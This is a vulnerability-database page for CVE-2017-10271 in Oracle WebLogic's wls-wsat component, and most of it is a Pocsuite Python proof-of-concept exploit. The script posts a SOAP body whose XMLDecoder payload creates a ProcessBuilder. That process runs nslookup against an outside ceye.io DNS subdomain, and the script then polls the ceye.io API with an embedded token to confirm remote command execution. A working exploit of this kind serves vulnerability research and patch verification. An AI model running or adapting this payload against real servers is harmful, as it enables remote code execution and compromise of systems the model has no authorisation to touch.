Vulners
Lucene search
Oracle WebLogic wls-wsat RCE(CVE-2017-10271)
10
#!/usr/bin/env python
# coding: utf-8
import random
import string
import urlparse
import time
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.lib.core.data import logger
class TestPOC(POCBase):
vulID = '97009'
version = '1'
author = ''
vulDate = '2017-10-23'
createDate = '2017-12-22'
updateDate = '2017-12-22'
references = [
'https://www.seebug.org/vuldb/ssvid-97009',
]
name = 'Oracle WebLogic wls-wsat RCE(CVE-2017-10271)'
appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'
appName = 'WebLogic'
appVersion = ''
vulType = 'Remote Command Execution'
desc = '''
Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。
Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。以下组版本受到影响:Oracle WebLogic Server 10.3.6.0.0版本,12.1.3.0.0版本,12.2.1.1.0版本,12.2.1.2.0版本。
'''
samples = []
def verify_request(self, token, type, flag):
retVal = False
counts = 3
url = "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}".format(token=token, type=type, flag=flag)
while counts:
try:
time.sleep(1)
resp = req.get(url)
if resp and resp.status_code == 200 and flag in resp.content:
retVal = True
break
except Exception as ex:
logger.warn(ex.message)
time.sleep(1)
counts -= 1
return retVal
def test_uri(self, uri):
flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
headers = {
'SOAPAction': "",
'Content-Type': 'text/xml;charset=UTF-8'
}
path = '/wls-wsat/CoordinatorPortType11'
url = urlparse.urljoin(uri, path)
postdata = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="2">
<void index="0">
<string>nslookup</string>
</void>
<void index="1">
<string>{0}.dns.j3170ioc.ceye.io</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
""".format(flag)
try:
resp = req.post(url, data=postdata, headers=headers)
if resp.status_code == 500 and self.verify_request(token="5df9bef9ed0d27df6f8csc1452b99b5b2p", type="dns", flag=flag):
return True
except Exception as ex:
logger.warning(ex.message)
return False
def _verify(self):
result = {}
pr = urlparse.urlparse(self.url)
ports = [7001]
if pr.port not in ports:
ports.insert(0, pr.port)
for port in ports:
uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
if self.test_uri(uri):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = uri
break
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Dec 2017 00:00Current
8.5High risk
Vulners AI Score8.5
EPSS0.94439